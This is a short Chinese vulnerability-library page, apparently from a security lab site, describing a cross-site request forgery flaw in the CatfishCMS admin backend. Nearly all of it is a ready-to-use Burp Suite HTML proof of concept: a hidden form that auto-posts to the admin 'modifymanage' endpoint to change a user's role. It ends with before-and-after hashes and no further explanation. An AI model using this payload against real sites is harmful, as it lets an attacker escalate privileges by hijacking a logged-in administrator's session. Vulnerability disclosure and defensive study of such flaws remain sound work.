CatfishCMS后台csrf-漏洞文库小世界-安全文库-NGC660 安全实验室

CatfishCMS后台csrf

CatfishCMS后台csrf

复现过程

首先需要登录后台

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
  <form action="http://url/index.php/admin/index/modifymanage.html?c=73" method="POST">
      <input type="hidden" name="uid" value="73" />
      <input type="hidden" name="juese" value="3" />
      <input type="hidden" name="verification" value="05f176843c20e12c1364e80b9869ac17" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

修改前

1f3961e5537b04d3503d0b14e89fc4e7

修改后

a23ea49ad2e247a39941066fef9c6ca5

请登录后发表评论

    请登录后查看回复内容